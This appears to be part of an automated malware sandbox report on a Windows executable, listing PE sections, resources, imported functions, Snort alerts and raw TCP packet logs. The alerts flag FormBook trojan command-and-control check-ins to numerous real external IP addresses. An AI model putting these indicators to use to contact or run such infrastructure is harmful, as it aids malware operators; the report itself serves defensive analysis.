                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x65ef0x6600False0.6750919117647058data6.514810500836391IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x80000x149a0x1600False0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0xa0000x2aff80x600False0.5162760416666666data4.036693470004838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .ndata0x350000x7f0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .rsrc0xb40000xe4280xe600False0.5885020380434782data6.531867172163398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_ICON0xb44480x627aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9777865926219754
                                                                                                                              RT_ICON0xba6c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.2599585062240664
                                                                                                                              RT_ICON0xbcc700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2954971857410882
                                                                                                                              RT_ICON0xbdd180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.2531982942430704
                                                                                                                              RT_ICON0xbebc00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.37663934426229506
                                                                                                                              RT_ICON0xbf5480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.24729241877256317
                                                                                                                              RT_ICON0xbfdf00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.22983870967741934
                                                                                                                              RT_ICON0xc04b80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.25670731707317074
                                                                                                                              RT_ICON0xc0b200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.21676300578034682
                                                                                                                              RT_ICON0xc10880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4370567375886525
                                                                                                                              RT_ICON0xc14f00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.3185483870967742
                                                                                                                              RT_ICON0xc17d80x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.36065573770491804
                                                                                                                              RT_ICON0xc19c00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.46621621621621623
                                                                                                                              RT_DIALOG0xc1ae80x100dataEnglishUnited States0.5234375
                                                                                                                              RT_DIALOG0xc1be80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                              RT_DIALOG0xc1d080xc4dataEnglishUnited States0.5918367346938775
                                                                                                                              RT_DIALOG0xc1dd00x60dataEnglishUnited States0.7291666666666666
                                                                                                                              RT_GROUP_ICON0xc1e300xbcdataEnglishUnited States0.6063829787234043
                                                                                                                              RT_VERSION0xc1ef00x1f4dataEnglishUnited States0.532
                                                                                                                              RT_MANIFEST0xc20e80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                              USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                              Possible Origin

                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                              EnglishUnited States

                                                                                                                              Network Behavior

                                                                                                                              Snort IDS Alerts

                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                              192.168.11.2037.97.254.2750140802855464 12/04/23-15:23:26.404582TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35014080192.168.11.2037.97.254.27
                                                                                                                              192.168.11.2076.76.21.14250180802855464 12/04/23-15:25:43.704528TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35018080192.168.11.2076.76.21.142
                                                                                                                              192.168.11.20108.179.192.3450198802855464 12/04/23-15:27:06.558710TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35019880192.168.11.20108.179.192.34
                                                                                                                              192.168.11.2091.195.240.1950169802855464 12/04/23-15:25:05.275269TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35016980192.168.11.2091.195.240.19
                                                                                                                              192.168.11.2037.97.254.2750195802855464 12/04/23-15:26:55.551474TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35019580192.168.11.2037.97.254.27
                                                                                                                              192.168.11.20198.177.123.10650202802855464 12/04/23-15:27:19.957865TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35020280192.168.11.20198.177.123.106
                                                                                                                              192.168.11.20217.160.0.2750216802855465 12/04/23-15:28:06.351089TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25021680192.168.11.20217.160.0.27
                                                                                                                              192.168.11.20217.160.0.2750213802855464 12/04/23-15:27:58.198613TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35021380192.168.11.20217.160.0.27
                                                                                                                              192.168.11.20104.232.106.16550162802855464 12/04/23-15:24:40.749060TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35016280192.168.11.20104.232.106.165
                                                                                                                              192.168.11.20198.252.98.6450205802855464 12/04/23-15:27:30.868265TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35020580192.168.11.20198.252.98.64
                                                                                                                              192.168.11.2089.31.143.9050165802855464 12/04/23-15:24:51.619983TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35016580192.168.11.2089.31.143.90
                                                                                                                              192.168.11.2091.195.240.11750157802855464 12/04/23-15:24:23.940310TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35015780192.168.11.2091.195.240.117
                                                                                                                              192.168.11.20216.40.34.4150138802855464 12/04/23-15:23:18.008509TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35013880192.168.11.20216.40.34.41
                                                                                                                              192.168.11.2091.195.240.1950176802855464 12/04/23-15:25:29.947701TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35017680192.168.11.2091.195.240.19
                                                                                                                              192.168.11.2091.195.240.11750156802855464 12/04/23-15:24:21.233377TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35015680192.168.11.2091.195.240.117
                                                                                                                              192.168.11.2091.195.240.11750210802855464 12/04/23-15:27:46.989673TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35021080192.168.11.2091.195.240.117
                                                                                                                              192.168.11.2091.195.240.1950230802855464 12/04/23-15:28:55.475392TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35023080192.168.11.2091.195.240.19
                                                                                                                              192.168.11.2023.227.38.7450218802855464 12/04/23-15:28:14.411942TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35021880192.168.11.2023.227.38.74
                                                                                                                              192.168.11.20198.177.123.10650149802855464 12/04/23-15:23:56.564327TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35014980192.168.11.20198.177.123.106
                                                                                                                              192.168.11.20108.179.192.3450145802855464 12/04/23-15:23:43.041183TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35014580192.168.11.20108.179.192.34
                                                                                                                              192.168.11.2076.76.21.14250181802855464 12/04/23-15:25:46.319391TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35018180192.168.11.2076.76.21.142
                                                                                                                              192.168.11.2074.208.236.24350186802855464 12/04/23-15:26:18.044367TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35018680192.168.11.2074.208.236.243
                                                                                                                              192.168.11.2074.208.236.24350132802855464 12/04/23-15:22:51.031161TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35013280192.168.11.2074.208.236.243
                                                                                                                              192.168.11.20198.252.98.6450206802855464 12/04/23-15:27:33.556193TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35020680192.168.11.20198.252.98.64
                                                                                                                              192.168.11.20198.177.123.10650148802855464 12/04/23-15:23:53.859838TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35014880192.168.11.20198.177.123.106
                                                                                                                              192.168.11.20172.67.202.15150172802855464 12/04/23-15:25:16.414796TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35017280192.168.11.20172.67.202.151
                                                                                                                              192.168.11.2091.195.240.1950224802855465 12/04/23-15:28:33.292427TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25022480192.168.11.2091.195.240.19
                                                                                                                              192.168.11.2089.117.169.14050233802855465 12/04/23-15:29:06.684862TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25023380192.168.11.2089.117.169.140
                                                                                                                              192.168.11.20198.252.98.6450153802855464 12/04/23-15:24:10.287144TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35015380192.168.11.20198.252.98.64
                                                                                                                              192.168.11.2023.227.38.7450217802855464 12/04/23-15:28:11.796370TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35021780192.168.11.2023.227.38.74
                                                                                                                              192.168.11.2091.195.240.11750209802855464 12/04/23-15:27:44.287436TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35020980192.168.11.2091.195.240.117
                                                                                                                              192.168.11.20172.67.202.15150173802855464 12/04/23-15:25:19.028644TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35017380192.168.11.20172.67.202.151
                                                                                                                              192.168.11.2074.208.236.24350185802855464 12/04/23-15:26:15.404471TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35018580192.168.11.2074.208.236.243
                                                                                                                              192.168.11.2074.208.236.24350133802855464 12/04/23-15:22:53.683531TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35013380192.168.11.2074.208.236.243
                                                                                                                              192.168.11.2091.195.240.1950177802855464 12/04/23-15:25:32.660419TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35017780192.168.11.2091.195.240.19
                                                                                                                              192.168.11.2091.184.0.20050225802855464 12/04/23-15:28:39.281903TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35022580192.168.11.2091.184.0.200
                                                                                                                              192.168.11.2091.184.0.20050228802855465 12/04/23-15:28:47.395926TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25022880192.168.11.2091.184.0.200
                                                                                                                              192.168.11.2091.195.240.1950229802855464 12/04/23-15:28:52.772299TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35022980192.168.11.2091.195.240.19
                                                                                                                              192.168.11.2091.195.240.1950168802855464 12/04/23-15:25:02.576416TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35016880192.168.11.2091.195.240.19
                                                                                                                              192.168.11.20198.252.98.6450152802855464 12/04/23-15:24:07.593823TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35015280192.168.11.20198.252.98.64
                                                                                                                              192.168.11.20198.177.123.10650201802855464 12/04/23-15:27:17.252864TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35020180192.168.11.20198.177.123.106
                                                                                                                              192.168.11.2037.97.254.2750193802855464 12/04/23-15:26:50.161400TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35019380192.168.11.2037.97.254.27
                                                                                                                              192.168.11.20108.179.192.3450197802855464 12/04/23-15:27:03.918009TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35019780192.168.11.20108.179.192.34
                                                                                                                              192.168.11.20104.232.106.16550160802855464 12/04/23-15:24:35.373199TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35016080192.168.11.20104.232.106.165
                                                                                                                              192.168.11.20108.179.192.3450144802855464 12/04/23-15:23:40.397599TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35014480192.168.11.20108.179.192.34
                                                                                                                              192.168.11.2037.97.254.2750194802855464 12/04/23-15:26:52.856779TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35019480192.168.11.2037.97.254.27
                                                                                                                              192.168.11.20216.40.34.4150191802855464 12/04/23-15:26:42.213639TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35019180192.168.11.20216.40.34.41
                                                                                                                              192.168.11.2037.97.254.2750141802855464 12/04/23-15:23:29.103007TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35014180192.168.11.2037.97.254.27
                                                                                                                              192.168.11.2091.195.240.1950221802855464 12/04/23-15:28:25.186374TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35022180192.168.11.2091.195.240.19
                                                                                                                              192.168.11.2091.195.240.1950222802855464 12/04/23-15:28:27.886938TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35022280192.168.11.2091.195.240.19
                                                                                                                              192.168.11.20216.40.34.4150136802855464 12/04/23-15:23:12.728913TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35013680192.168.11.20216.40.34.41
                                                                                                                              192.168.11.2089.31.143.9050164802855464 12/04/23-15:24:48.913010TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35016480192.168.11.2089.31.143.90
                                                                                                                              192.168.11.20216.40.34.4150137802855464 12/04/23-15:23:15.367647TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35013780192.168.11.20216.40.34.41
                                                                                                                              192.168.11.2023.227.38.7450220802855465 12/04/23-15:28:19.660556TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25022080192.168.11.2023.227.38.74
                                                                                                                              192.168.11.2091.184.0.20050226802855464 12/04/23-15:28:41.994136TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35022680192.168.11.2091.184.0.200
                                                                                                                              192.168.11.20216.40.34.4150189802855464 12/04/23-15:26:36.932413TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35018980192.168.11.20216.40.34.41
                                                                                                                              192.168.11.20217.160.0.2750214802855464 12/04/23-15:28:00.914663TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35021480192.168.11.20217.160.0.27
                                                                                                                              192.168.11.20104.232.106.16550161802855464 12/04/23-15:24:38.061121TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35016180192.168.11.20104.232.106.165
                                                                                                                              192.168.11.20216.40.34.4150190802855464 12/04/23-15:26:39.573354TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35019080192.168.11.20216.40.34.41

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 4, 2023 15:22:02.900290012 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:02.900408030 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:02.900609970 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:02.922162056 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:02.922182083 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.136816025 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.137042999 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.137042999 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.138140917 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.138372898 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.211863041 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.211910963 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.213939905 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.214109898 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.217466116 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.264620066 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.631759882 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.631983995 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.632081985 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.632297993 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.632539988 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.632678032 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.633728027 CET50129443192.168.11.20142.250.80.46
                                                                                                                              Dec 4, 2023 15:22:03.633789062 CET44350129142.250.80.46192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.774497986 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:03.774595976 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.774805069 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:03.775188923 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:03.775252104 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.009269953 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.009502888 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.009502888 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.010835886 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.011048079 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.017091036 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.017110109 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.017622948 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.017801046 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.018090963 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.060671091 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.273448944 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.273735046 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.286602020 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.286858082 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.299716949 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.300008059 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.306456089 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.306689978 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.306689978 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.313007116 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.313251019 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.313303947 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.313554049 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.319791079 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.320039034 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.320101023 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.320358992 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.365161896 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.365416050 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.365478992 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.365689039 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.368443012 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.368633986 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.368704081 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.368956089 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.375104904 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.375505924 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.375566006 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.375808954 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.381871939 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.382133007 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.382198095 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.382425070 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.388253927 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.388505936 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.388578892 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.388823032 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.395236015 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.395484924 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.395548105 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.395793915 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.401941061 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.402158976 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.402225018 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.402463913 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.408246994 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.408515930 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.408603907 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.408854008 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.414891958 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.415143967 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.418257952 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.418495893 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.418549061 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.418807030 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.424761057 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.425020933 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.425074100 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.425308943 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.430831909 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.431086063 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.431143045 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.431391954 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.436398983 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.436680079 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.436733007 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.436971903 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.441988945 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.442260027 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.442313910 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.442531109 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.447940111 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.448224068 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.448276997 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.448530912 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.453258991 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.453516006 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.453569889 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.453810930 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.459095001 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.459340096 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.459393978 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.459606886 CET50130443192.168.11.20142.251.41.1
